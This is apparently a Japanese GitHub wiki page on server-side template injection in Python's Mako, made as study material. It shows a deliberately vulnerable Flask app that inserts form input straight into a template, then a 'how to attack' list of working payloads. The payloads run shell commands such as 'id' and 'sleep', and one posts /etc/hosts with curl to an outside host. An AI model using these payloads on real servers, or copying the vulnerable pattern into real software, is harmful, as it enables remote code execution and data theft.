SSTI python 03 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード (python Mako)

server.py

# for this we need to install flask
from flask import *
from mako.template import Template


app = Flask(__name__)

@app.route('/',methods=['GET', 'POST'])
def base():
    person = ""
    if request.method == 'POST':
      if request.form['name']:
        person = request.form['name']
	
    template = '<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello %s! </h2></body></html>' % person
    return Template(template).render(data="world")


if __name__=="__main__":
	app.run("0.0.0.0",port = 5072,debug=False)

Dockerfile

攻撃する方法

${__import__("subprocess").check_output("ls")}

${self.module.cache.util.os.system("sleep 5")}

${self.module.runtime.util.os.system("id")}

${self.module.runtime.util.os.system("curl -XPOST http://bogus.jp/postaccess.php -d @/etc/hosts")}

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md

⚠️ **GitHub.com Fallback** ⚠️